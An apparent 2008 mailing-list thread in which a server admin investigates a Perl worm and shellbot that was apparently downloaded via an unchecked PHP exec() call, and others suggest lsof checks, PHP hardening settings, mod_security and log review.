sbeam schrieb:
On Tuesday 12 August 2008 09:08, Mr Shunz wrote:
maybe you should check with "lsof -p 3041" and see which files/pipes it uses to have a clue.
of course! <slap>
it's a perl w0rm that was uploaded last night, now killed. Now to determine how it got in.
I found some output in the main apache error log that looks like wget was used to download a shellbot. But I can't figure out how wget was called, may be some PHP exec() call that is unchecked.
Anything in /tmp ?
Disable register_globals and allow_url_fopen. Set open_basedir for any virtual hosts to the absolute minimum.
That will help a bit.
But I can't find it on the system yet or the data files it uses.
chkrootkit says all is clear.
mod_security is now being installed, belatedly. This server has only been up 1 week, sheesh.
thanks Sam
It was most likely executed via a remote server. Look for URLs in the logs that fetch stuff from remote servers.
cheers, Rainer